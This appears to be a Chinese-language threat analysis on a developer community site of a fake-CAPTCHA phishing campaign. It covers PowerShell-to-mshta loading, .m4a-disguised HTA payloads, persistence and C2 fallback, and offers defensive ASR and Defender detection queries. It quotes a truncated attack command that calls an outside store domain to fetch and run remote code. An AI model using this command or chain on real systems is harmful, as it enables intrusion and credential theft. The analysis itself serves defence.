前往小程序,Get更优阅读体验!
立即前往
发布
社区首页 >专栏 >新型钓鱼攻击:伪装CAPTCHA验证的隐蔽式代码注入攻击分析

新型钓鱼攻击:伪装CAPTCHA验证的隐蔽式代码注入攻击分析

原创
作者头像
Khan安全团队
发布2025-02-19 11:51:11
发布2025-02-19 11:51:11
13000
代码可运行
举报
运行总次数:0
代码可运行

一、事件背景

        攻击者以"CAPTCHA验证"(验证码校验)为诱饵,诱导用户执行恶意PowerShell指令,通过多阶段隐蔽加载技术实施网络攻击。


二、攻击链技术解析

1. 初始攻击向量

代码语言:javascript
代码运行次数:0
复制
powershell -w 1 -C "$l='https://pajmina.store/...';Invoke-CimMethod ..."
  • 窗口隐藏参数-w 1使PowerShell窗口处于隐藏状态
  • 字符串混淆('ms' + 'hta' + '.exe')规避基础字符串检测
  • CIM/WMI调用:使用Invoke-CimMethod替代传统Start-Process,绕过部分行为监控

2. 载荷投递阶段

组件

技术细节

规避检测手段

mshta.exe

执行远程HTA应用

白名单程序滥用

.m4a扩展名

伪造成音频文件的恶意脚本

文件类型混淆

域名策略

使用新注册的.store域名

规避信誉评分系统

3. 持久化机制

攻击成功后会建立以下持久化通道:

  1. 注册表自启动项:HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  2. 计划任务创建:每小时检测载荷有效性
  3. 备用C2服务器轮询:包含3个备用域名解析

三、攻击危害评估

1. 直接威胁

  • 远程代码执行(RCE):可部署Cobalt Strike等攻击框架
  • 凭据窃取:Hook浏览器内存读取Cookie/密码
  • 横向移动:利用WMI进行内网渗透

四、防御方案建议

1. 预防措施

代码语言:javascript
代码运行次数:0
复制
# 启用攻击面缩减规则(ASR)
Set-MpPreference -AttackSurfaceReductionRules_Ids 56a863a9-875e-4185-98a7-b882c64b5ce5 -AttackSurfaceReductionRules_Actions Enabled
  • 应用控制策略:限制PowerShell执行未签名脚本
  • 网络分段:对WMI流量实施TCP 135端口监控
  • 邮件网关:配置MIME类型过滤规则阻断.m4a/.hta

2. 检测方案

代码语言:javascript
代码运行次数:0
复制
// Microsoft Defender高级查询
DeviceProcessEvents
| where FileName in~ ("mshta.exe", "powershell.exe")
| where ProcessCommandLine has_any (".m4a", "Invoke-CimMethod", "-WindowStyle Hidden")

3. 应急响应流程

  1. 内存取证:使用Volatility提取恶意进程
  2. 网络取证:分析DNS查询记录定位C2
  3. 磁盘取证:检索$MFT时间线追踪攻击路径

五、案例还原与启示

本次事件中攻击者使用了三阶段混淆技术

  1. 社会工程层:伪造CAPTCHA验证UID提升可信度
  2. 执行层:分离式命令拼接绕过基础HIDS检测
  3. 载荷层:HTA文件嵌套JavaScript加载Shellcode

该案例验证了MITRE ATT&CK框架中的:

  • T1059.001(命令行接口)
  • T1218.005(Mshta滥用)
  • T1047(WMI利用)

六、建议

  • 验证所有"系统验证"请求的真实性
  • 警惕非常规域名(如.store/.top等新gTLD)
  • 禁用Windows默认的自动执行功能

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 一、事件背景
  • 二、攻击链技术解析
    • 1. 初始攻击向量
    • 2. 载荷投递阶段
    • 3. 持久化机制
  • 三、攻击危害评估
    • 1. 直接威胁
  • 四、防御方案建议
    • 1. 预防措施
    • 2. 检测方案
    • 3. 应急响应流程
  • 五、案例还原与启示
  • 六、建议
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档